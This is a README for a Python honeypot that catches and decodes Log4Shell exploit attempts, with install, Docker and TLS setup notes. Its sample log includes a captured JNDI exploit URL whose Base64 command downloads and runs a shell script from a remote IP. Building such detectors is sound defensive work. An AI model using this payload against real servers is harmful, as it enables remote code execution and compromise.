Log4j exploit catcher, detect Log4Shell exploits and try to get payloads. This is a basic python server that listen on a port and logs information when a wild log4j exploit appears
The Phorcys dependency is used to decode payload automatically and then match with Yara rules.
sudo apt install protobuf-compiler
sudo apt install libcurl4-nss-dev libpython3.9-dev libnss3 libnss3-devThe previous command works for python3.9 versions, you should change to the proper version you are using. However, the code is made for python3.7 or higher.
pip install -r requirements.txtFor ports that don't require TLS
with python:
python3 detector.py [port]with docker:
docker build -t log4j_catcher .
docker run -itp 8080:8080 --env PORT=8080 log4j_catcherFor services with TLS it is recommended to have another component to handle the TLS protocol. I typically run NGINX as a reverse proxy on the port 443 to forward https traffic to the honeypot.
Example:
$ sudo python3 detector.py 80
2021-12-10 23:39:59,951 INFO:Incoming connection from ('1.2.3.4', 51512)
2021-12-10 23:40:28,997 INFO:Incoming connection from ('1.2.3.4', 37532)
2021-12-11 03:53:36,729 INFO:Found payload jndi from ('45.137.21.9', 55378)
2021-12-11 03:53:36,729 INFO:URL: 45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==Data is logged into current directory path.
On Ubuntu 18.04 the python3 package is version 3.6, which is incompatible with the script.
To install python in higher version, you can follow this link: https://gist.github.com/plembo/6bc141a150cff0369574ce0b0a92f5e7
Then create a virtualenv using
$ python3.9 -m venv ./env
$ . ./env/bin/activateIt should be possible to install everything from now on.
If you run into other issues, you can contact me on twitter @entropyqueen_ with a description of your issue.